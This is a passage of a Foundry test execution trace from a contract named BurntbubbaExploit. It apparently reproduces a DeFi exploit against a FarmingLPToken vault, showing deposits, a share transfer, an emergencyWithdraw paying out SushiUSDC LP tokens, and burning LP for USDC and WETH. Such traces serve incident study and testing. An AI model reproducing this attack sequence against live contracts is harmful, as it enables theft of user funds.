    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], to: 0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404, value: 94307603729067727160 [9.43e19])
    │   │   │   │   │   │   │   │   ├─ emit Approval(owner: FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], spender: 0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404, value: 115792089237316195423570985008687907853269984665640564039362897964006458380425 [1.157e77])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xa28a8b7cfb6d0602e84d6f346d44b3517b6b439001832d40b2bb75697bf727c5: 0xfffffffffffffffffffffffffffffffffffffffffffffffffabf82a9dd34a9c1 → 0xfffffffffffffffffffffffffffffffffffffffffffffffaddf798bc2bd1d089
    │   │   │   │   │   │   │   │   │   @ 0x1cec5eef9df4081afaa3b2d3b6f98fb620530aba98c0e5aad3e986a20745e7f7: 0 → 0x0000000000000000000000000000000000000000000000051cc7e9edb162d938
    │   │   │   │   │   │   │   │   │   @ 0x8628260ef1dd54c9585eeca4cf442c5a0a6c867bc53f9b5267c8d0ca4c7d2930: 0x0000000000000000000000000000000000000000000000051cc7e9edb162d938 → 0
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [26428] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::enter(94307603729067727160 [9.43e19])
    │   │   │   │   │   │   │   │   ├─ [578] SUSHI::balanceOf(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 33289102665525200578318142 [3.328e25]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404, value: 69564060298575082754 [6.956e19])
    │   │   │   │   │   │   │   │   ├─ [13680] SUSHI::transferFrom(0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404, 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, 94307603729067727160 [9.43e19])
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404, to: 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, value: 94307603729067727160 [9.43e19])
    │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404, spender: 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, value: 115792089237316195423570985008687907853269984665640564039362885238905490524725 [1.157e77])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0xf5dfda8b71418f81f14e3ee1bbd83955e08575942129eda6b47eb711f1c4256c: 0xfffffffffffffffffffffffffffffffffffffffffffffffffa924d406a49236d → 0xfffffffffffffffffffffffffffffffffffffffffffffffaddca6352b8e64a35
    │   │   │   │   │   │   │   │   │   │   @ 0x7680d8abe5dc20991fcb0c7b95636582d139e7626e26f5e78ea0d53ad541434d: 0x0000000000000000000000000000000000000000001b893ddf1ace3b97028f3e → 0x0000000000000000000000000000000000000000001b8942fbe2b82948656876
    │   │   │   │   │   │   │   │   │   │   @ 0x1cec5eef9df4081afaa3b2d3b6f98fb620530aba98c0e5aad3e986a20745e7f7: 0x0000000000000000000000000000000000000000000000051cc7e9edb162d938 → 0
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000144fba5471d84828b48f27 → 0x000000000000000000000000000000000000000000144fbe19d7088ea7208429
    │   │   │   │   │   │   │   │   │   @ 0x1cec5eef9df4081afaa3b2d3b6f98fb620530aba98c0e5aad3e986a20745e7f7: 0x00000000000000000000000000000000000000000000000004044a913dff7920 → 0x000000000000000000000000000000000000000000000003c9697ad7bc6b6e22
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], value: 69564060298575224934 [6.956e19])
    │   │   │   │   │   │   │   ├─ emit Deposit(param0: FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], param1: FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], param2: 94307603729067727160 [9.43e19], param3: 69564060298575224934 [6.956e19])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xf5dfda8b71418f81f14e3ee1bbd83955e08575942129eda6b47eb711f1c4256c: 0xfffffffffffffffffffffffffffffffffffffffffffffffffa924d406a49236d → 0xfffffffffffffffffffffffffffffffffffffffffffffffaddca6352b8e64a35
    │   │   │   │   │   │   │   │   @ 2: 0x00000000000000000000000000000000000000000000000004044a913dff7b6f → 0x000000000000000000000000000000000000000000000003c9697ad7bc6d9bd5
    │   │   │   │   │   │   │   │   @ 0x8628260ef1dd54c9585eeca4cf442c5a0a6c867bc53f9b5267c8d0ca4c7d2930: 0x00000000000000000000000000000000000000000000000003e2d6f4319fb742 → 0x000000000000000000000000000000000000000000000003c948073ab00dd7a8
    │   │   │   │   │   │   │   └─ ← [Return] 69564060298575224934 [6.956e19]
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 132925896953047092702474 [1.329e23])
    │   │   │   │   │   │   ├─ emit Deposit(param0: 132925896953047092702474 [1.329e23], param1: 25156809832 [2.515e10], param2: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 23: 0x0000000000000000000000000000000000115552dbafc81f2c0ed1feba35512a → 0x00000000000000000000000000000000078675608026695f07f68035cf5a33cb
    │   │   │   │   │   │   │   @ 0x2d54905f2886c13936added7edccb32207862f31b1e49ad77f933216b9848722: 0 → 0x000000000000000000000000000000000000000000001c25ed645f35e6fe2d0a
    │   │   │   │   │   │   │   @ 0x79790d49d0267d92ce6d90ec62fe2b266199a3c4ebbf94a8c72f1af22bb92368: 0 → 0xffffffffffffff2c2dc00d0c9b675f1de008fada753d1b833cf5b46445f54b12
    │   │   │   │   │   │   │   @ 0x6f198ca50d5350c385681ed003c8bff69eca51bc1edac00cc73a8863d2dacd2a: 0x00000000000000000000000000000000000000000000000d4d0e6703ff4714cb → 0x0000000000000000000000000000000000000000000000126f64984f5f2242dc
    │   │   │   │   │   │   │   @ 9: 0x00000000000000000000000000000000000000000000008173dc72e905e64fd5 → 0x000000000000000000000000000000000000000000001ca76140d21eece47cdf
    │   │   │   │   │   │   │   @ 0x758cf28c497240df37f2bfba6e924370623e4f2e5493f3940b7ca78b3d8fbfde: 0 → 0x00000000000000000000000000000000000000000000000000000005db767468
    │   │   │   │   │   │   │   @ 22: 0x00000000000000000000000000000000000000000000000000001369a59138c2 → 0x0000000000000000000000000000000000000000000000000000136f8107ad2a
    │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   └─ ← [Return]
    │   │   │   │   ├─ [0] VM::load(0x4Bc691601B50B3e107B89d5EA172B40a9dbC6251, 0x000000000000000000000000000000000000000000000000000000000000000a) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000012523ffe58c2
    │   │   │   │   ├─ [749] FarmingLPToken::withdrawableTotalLPs() [staticcall]
    │   │   │   │   │   ├─ [583] 0x44D1C6b94B282c678c95B7f4B18de5A53EA4Fa9f::withdrawableTotalLPs() [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 21369627061546 [2.136e13]
    │   │   │   │   │   └─ ← [Return] 21369627061546 [2.136e13]
    │   │   │   │   ├─ [727] FarmingLPToken::totalShares() [staticcall]
    │   │   │   │   │   ├─ [561] 0x44D1C6b94B282c678c95B7f4B18de5A53EA4Fa9f::totalShares() [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 135313875612710014844127 [1.353e23]
    │   │   │   │   │   └─ ← [Return] 135313875612710014844127 [1.353e23]
    │   │   │   │   ├─ [17061] FarmingLPToken::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   ├─ [16889] 0x44D1C6b94B282c678c95B7f4B18de5A53EA4Fa9f::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   ├─ [494] 0xEE083E0F0f5dE2ff34662F1ef6f76d897d5047EF::yieldVault() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000003e55ac0e6724bbe8ab40a60771b5d60fc8e93404
    │   │   │   │   │   │   ├─ [494] 0xEE083E0F0f5dE2ff34662F1ef6f76d897d5047EF::yieldVault() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000003e55ac0e6724bbe8ab40a60771b5d60fc8e93404
    │   │   │   │   │   │   ├─ [2802] 0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd::pendingSushi(1, FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E]) [staticcall]
    │   │   │   │   │   │   │   ├─ [492] SushiUSDC::balanceOf(0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 76878897652346938 [7.687e16]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ [2853] 0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404::previewDeposit(0) [staticcall]
    │   │   │   │   │   │   │   ├─ [578] SUSHI::balanceOf(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 33289196973128929646045302 [3.328e25]
    │   │   │   │   │   │   │   ├─ [321] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::totalSupply() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 24555090087779670004106281 [2.455e25]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [3340] 0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404::convertToAssets(0) [staticcall]
    │   │   │   │   │   │   │   ├─ [321] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::totalSupply() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 24555090087779670004106281 [2.455e25]
    │   │   │   │   │   │   │   ├─ [578] SUSHI::balanceOf(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 33289196973128929646045302 [3.328e25]
    │   │   │   │   │   │   │   ├─ [490] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::balanceOf(0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 69853498562304503330 [6.985e19]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Return] 132925896953047092702474 [1.329e23]
    │   │   │   │   │   └─ ← [Return] 132925896953047092702474 [1.329e23]
    │   │   │   │   ├─ [62911] FarmingLPToken::transfer(toAddr: [0x5192D3Bf56879E953FD483f105975961F736ea8f], 5369794355945257080190 [5.369e21])
    │   │   │   │   │   ├─ [62733] 0x44D1C6b94B282c678c95B7f4B18de5A53EA4Fa9f::transfer(toAddr: [0x5192D3Bf56879E953FD483f105975961F736ea8f], 5369794355945257080190 [5.369e21]) [delegatecall]
    │   │   │   │   │   │   ├─ [494] 0xEE083E0F0f5dE2ff34662F1ef6f76d897d5047EF::yieldVault() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000003e55ac0e6724bbe8ab40a60771b5d60fc8e93404
    │   │   │   │   │   │   ├─ [494] 0xEE083E0F0f5dE2ff34662F1ef6f76d897d5047EF::yieldVault() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000003e55ac0e6724bbe8ab40a60771b5d60fc8e93404
    │   │   │   │   │   │   ├─ [2802] 0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd::pendingSushi(1, FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E]) [staticcall]
    │   │   │   │   │   │   │   ├─ [492] SushiUSDC::balanceOf(0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 76878897652346938 [7.687e16]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ [2853] 0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404::previewDeposit(0) [staticcall]
    │   │   │   │   │   │   │   ├─ [578] SUSHI::balanceOf(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 33289196973128929646045302 [3.328e25]
    │   │   │   │   │   │   │   ├─ [321] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::totalSupply() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 24555090087779670004106281 [2.455e25]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [3340] 0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404::convertToAssets(0) [staticcall]
    │   │   │   │   │   │   │   ├─ [321] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::totalSupply() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 24555090087779670004106281 [2.455e25]
    │   │   │   │   │   │   │   ├─ [578] SUSHI::balanceOf(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 33289196973128929646045302 [3.328e25]
    │   │   │   │   │   │   │   ├─ [490] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::balanceOf(0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 69853498562304503330 [6.985e19]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ emit Transfer(from: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: toAddr: [0x5192D3Bf56879E953FD483f105975961F736ea8f], value: 5369794355945257080190 [5.369e21])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x79790d49d0267d92ce6d90ec62fe2b266199a3c4ebbf94a8c72f1af22bb92368: 0xffffffffffffff2c2dc00d0c9b675f1de008fada753d1b833cf5b46445f54b12 → 0xffffffffffffff34bc529a4cc7d9670a417d1acb75807ff85c5bd40dfa57effc
    │   │   │   │   │   │   │   @ 0xd54264a6e471a9baa9eae96288f25353a57c4849e51bf9b78b3fc1a6e8d7348c: 0 → 0x00000000000000088e928d402c7207ec61741ff1004364751f661fa9b462a4ea
    │   │   │   │   │   │   │   @ 0x2d54905f2886c13936added7edccb32207862f31b1e49ad77f933216b9848722: 0x000000000000000000000000000000000000000000001c25ed645f35e6fe2d0a → 0x000000000000000000000000000000000000000000001b02d48682de4075978c
    │   │   │   │   │   │   │   @ 0x617e0a6d76f52d529e82f6814f93080848238973ad9a12ea0f3cc051d0770b20: 0 → 0x00000000000000000000000000000000000000000000012318dddc57a688957e
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [68820] FarmingLPToken::emergencyWithdraw(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─ [68651] 0x44D1C6b94B282c678c95B7f4B18de5A53EA4Fa9f::emergencyWithdraw(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   ├─ [34447] 0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd::withdraw(1, 20144470251713 [2.014e13])
    │   │   │   │   │   │   │   ├─ [578] SUSHI::balanceOf(0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 1007640970897297378305351 [1.007e24]
    │   │   │   │   │   │   │   ├─ [3325] SUSHI::transfer(FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], 0)
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd, to: FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], value: 0)
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [23076] SushiUSDC::transfer(FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], 20144470251713 [2.014e13])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd, to: FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], value: 20144470251713 [2.014e13])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x758cf28c497240df37f2bfba6e924370623e4f2e5493f3940b7ca78b3d8fbfde: 0 → 0x000000000000000000000000000000000000000000000000000012523ffe58c1
    │   │   │   │   │   │   │   │   │   @ 0xa777cf56dcfa637cf077d373873b63e894627ab94356bfcf2c82191ee15b5b14: 0x000000000000000000000000000000000000000000000000011120f3394ab03a → 0x00000000000000000000000000000000000000000000000001110ea0f94c5779
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ emit Withdraw(user: FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], pid: 1, amount: 20144470251713 [2.014e13])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x6f198ca50d5350c385681ed003c8bff69eca51bc1edac00cc73a8863d2dacd2a: 0x0000000000000000000000000000000000000000000000126f64984f5f2242dc → 0x0000000000000000000000000000000000000000000000010e921ddd17a860f4
    │   │   │   │   │   │   │   │   @ 0x6f198ca50d5350c385681ed003c8bff69eca51bc1edac00cc73a8863d2dacd29: 0x0000000000000000000000000000000000000000000000000000136f8107ad2a → 0x0000000000000000000000000000000000000000000000000000011d41095469
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [23076] SushiUSDC::transfer(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 20144470251713 [2.014e13])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 20144470251713 [2.014e13])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x758cf28c497240df37f2bfba6e924370623e4f2e5493f3940b7ca78b3d8fbfde: 0x000000000000000000000000000000000000000000000000000012523ffe58c1 → 0
    │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000000000012523ffe58c1
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ emit Transfer(from: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 127556102597101835622284 [1.275e23])
    │   │   │   │   │   │   ├─ emit EmergencyWithdraw(param0: 127556102597101835622284 [1.275e23], param1: 20144470251713 [2.014e13], param2: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 9: 0x000000000000000000000000000000000000000000001ca76140d21eece47cdf → 0x0000000000000000000000000000000000000000000001a48cba4f40ac6ee553
    │   │   │   │   │   │   │   @ 0x79790d49d0267d92ce6d90ec62fe2b266199a3c4ebbf94a8c72f1af22bb92368: 0xffffffffffffff34bc529a4cc7d9670a417d1acb75807ff85c5bd40dfa57effc → 0
    │   │   │   │   │   │   │   @ 0x2d54905f2886c13936added7edccb32207862f31b1e49ad77f933216b9848722: 0x000000000000000000000000000000000000000000001b02d48682de4075978c → 0
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000000000012523ffe58c1
    │   │   │   │   │   │   │   @ 22: 0x0000000000000000000000000000000000000000000000000000136f8107ad2a → 0x0000000000000000000000000000000000000000000000000000011d41095469
    │   │   │   │   │   │   │   @ 0x758cf28c497240df37f2bfba6e924370623e4f2e5493f3940b7ca78b3d8fbfde: 0 → 0x000000000000000000000000000000000000000000000000000012523ffe58c1
    │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   └─ ← [Return]
    │   │   │   │   ├─ [492] SushiUSDC::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 20144470251713 [2.014e13]
    │   │   │   │   ├─ [25076] SushiUSDC::transfer(SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0], 20144470251713 [2.014e13])
    │   │   │   │   │   ├─ emit Transfer(from: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0], value: 20144470251713 [2.014e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000000012523ffe58c1 → 0
    │   │   │   │   │   │   @ 0x5aade237fe7098105fd403b33878646ff1c6e057ff82716bc9688da9ff0a87c5: 0 → 0x000000000000000000000000000000000000000000000000000012523ffe58c1
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [42476] SushiUSDC::burn(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─ [1315] USDC::balanceOf(SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0]) [staticcall]
    │   │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 7014213105075 [7.014e12]
    │   │   │   │   │   │   └─ ← [Return] 7014213105075 [7.014e12]
    │   │   │   │   │   ├─ [534] WETH::balanceOf(SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 3445432035340938810944 [3.445e21]
    │   │   │   │   │   ├─ [338] 0xC0AEe478e3658e2610c5F7A4A2E1777cE9e4f2Ac::feeTo() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x5ad6211CD3fdE39A9cECB5df6f380b8263d1e277
    │   │   │   │   │   ├─ emit Transfer(from: SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0], to: 0x0000000000000000000000000000000000000000, value: 20144470251713 [2.014e13])
    │   │   │   │   │   ├─ [4817] USDC::transfer(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1601512305 [1.601e9])
    │   │   │   │   │   │   ├─ [4028] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1601512305 [1.601e9]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0], to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1601512305 [1.601e9])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x000000000000000000000000000000000000000000000000000000002f71ff00 → 0x000000000000000000000000000000000000000000000000000000008ee72271
    │   │   │   │   │   │   │   │   @ 0xcd1718b39694c8b71b5b7030a9f4416a979d5bffcde56263723356d0f75e4776: 0x000000000000000000000000000000000000000000000000000006611fae35b3 → 0x00000000000000000000000000000000000000000000000000000660c0391242
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [3262] WETH::transfer(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 786674387891306409 [7.866e17])
    │   │   │   │   │   │   ├─ emit Transfer(from: SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0], to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 786674387891306409 [7.866e17])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xb440be4deffff278a0a54bece4d5bba517a3236073012092c2f7526f6434fd2c: 0x0000000000000000000000000000000000000000000000bac6f9857617c69640 → 0x0000000000000000000000000000000000000000000000babc0eb146039dd697
    │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000006ecddd9a569b061 → 0x00000000000000000000000000000000000000000000000011d7b209b992700a
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [1315] USDC::balanceOf(SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0]) [staticcall]
    │   │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 7012611592770 [7.012e12]
    │   │   │   │   │   │   └─ ← [Return] 7012611592770 [7.012e12]
    │   │   │   │   │   ├─ [534] WETH::balanceOf(SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 3444645360953047504535 [3.444e21]
    │   │   │   │   │   ├─ emit Sync(reserve0: 7012611592770 [7.012e12], reserve1: 3444645360953047504535 [3.444e21])
    │   │   │   │   │   ├─ emit Burn(sender: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0: 1601512305 [1.601e9], amount1: 786674387891306409 [7.866e17], to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5aade237fe7098105fd403b33878646ff1c6e057ff82716bc9688da9ff0a87c5: 0x000000000000000000000000000000000000000000000000000012523ffe58c1 → 0
    │   │   │   │   │   │   @ 8: 0x6567bb5b0000000000bac6f9857617c69640000000000000000006611fae35b3 → 0x6567bb5b0000000000babc0eb146039dd69700000000000000000660c0391242
    │   │   │   │   │   │   @ 11: 0x000000000000000000000000000000000004a7865adef8da760367ea9c764ec0 → 0x000000000000000000000000000000000004a6fb145653ee8dc5d2040f66f0ee
    │   │   │   │   │   │   @ 0: 0x0000000000000000000000000000000000000000000000000139728bd4a1b74d → 0x0000000000000000000000000000000000000000000000000139603994a35e8c
    │   │   │   │   │   └─ ← [Return] 1601512305 [1.601e9], 786674387891306409 [7.866e17]
    │   │   │   │   ├─ [492] AST_SUSHI::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 63245553202367 [6.324e13]
    │   │   │   │   ├─ [25076] AST_SUSHI::transfer(AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9], 63245553202367 [6.324e13])
    │   │   │   │   │   ├─ emit Transfer(from: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9], value: 63245553202367 [6.324e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000000398580bb74bf → 0
    │   │   │   │   │   │   @ 0xa4f1b68206ed880deebad612631f03c76c4a32d9c7f0f6c96d2043f8dd4db066: 0 → 0x0000000000000000000000000000000000000000000000000000398580bb74bf
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [77397] AST_SUSHI::burn(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
